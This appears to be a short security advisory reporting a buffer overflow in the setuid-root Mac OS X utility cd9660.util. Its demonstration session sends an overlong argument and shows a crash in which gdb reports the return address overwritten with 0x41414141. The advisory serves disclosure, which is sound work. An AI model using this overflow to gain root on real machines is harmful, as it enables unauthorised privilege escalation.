|
Brought to you by:
Suppliers of:
|
|
|
| |
| Some parts of MacOS X that did not come from BSD, as such, they contain significant security issues, and an example of this is the /System/Library/Filesystems/cd9660.fs/cd9660.util utility. This utility is suid root and is vulnerable to a classic buffer overflow due to the lack of input validation. |
| |
Credit:
The information has been provided by Max.
|
| |
Demonstration:
sdsx:/System/Library/Filesystems/cd9660.fs max$ ls -la cd9660.util
-rwsr-xr-x 1 root wheel 20476 23 Sep 23:53 cd9660.util
sdsx:/System/Library/Filesystems/cd9660.fs max$ ./cd9660.util -p `perl -e "print 'A'x512"` Segmentation fault
sdsx:/System/Library/Filesystems/cd9660.fs root# gdb -core /cores/core.1405 ./cd9660.util [gdb banner here]
Reading symbols for shared libraries .... done
Core was generated by `./cd9660.util'. #0 0x9000d360 in strcat ()
(gdb) where
#0 0x9000d360 in strcat ()
#1 0x00002b84 in main ()
#2 0x41414141 in ?? ()
|
|
|
|
|
